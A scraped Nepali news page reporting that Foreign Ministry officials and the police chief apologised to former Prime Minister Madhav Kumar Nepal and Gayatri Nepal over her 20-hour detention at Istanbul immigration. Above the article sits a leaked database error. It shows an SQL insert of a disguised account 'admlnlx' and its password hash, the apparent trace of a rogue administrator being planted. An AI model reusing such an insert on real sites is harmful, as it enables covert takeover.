WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIgsDhPbNv6UukgAcQSeFfap.KVEqr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:18:52', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ११-
परराष्ट्र मन्त्रालयाले पूर्वप्रधानमनत्री माधवकुमार नेपाल र उनकी पत्नी गायत्री नेपालसँग आफूहरुको कमजोरीको कारण टर्कीमा दुख पाएको भन्दै माफी मागेको छ ।
नेपाल दम्पती अमेरिकाबाट फर्केलगत्तै परराष्ट्रसचिव शंकरदास बैरागी, राहदानी विभागका प्रमुख सुशिल लम्साल, प्रहरी महानिरीक्षक उपेन्द्रकान्त अर्याललगायतका अधिकारीहरु नेपाल निवास कोटेश्वर पुगेर माफी मागेका हुन् ।
सचिव बैरागी र विभाग प्रमुख लम्सालले इस्तानबुल अध्यागमनको घटनाले आफूहरुलाइ दुखी बनाएको भन्दै नेपाल दम्पतीसँग माफी मागेका हुन् । प्रहरी महानिरीक्षक अर्यालले नेपाल प्रहरीको कुनै दोष नरहेको भन्दै घटनाप्रति दुख व्यक्त गरेका थिए ।
परराष्ट्र मन्त्रालयको हेलचेक्रयाइँ र नेपाल प्रहरीको असावधानीका कारण पूर्वप्रधानमन्त्री माधव पत्नी गायत्री टर्कीको इस्तानबुलस्थित अध्यागमनमा २० घण्टा नियन्त्रणमा परेकी थिइन् । ६ महिनाअघि म्याद सकिएको पासपोर्टबाहक र परराष्ट्रको राहदानी विभागको गैरजिम्मेवारीका कारण गायत्रीले यस्तो दुख झेल्नु परेको अन्नपूर्ण पोष्ट मा खबर छ ।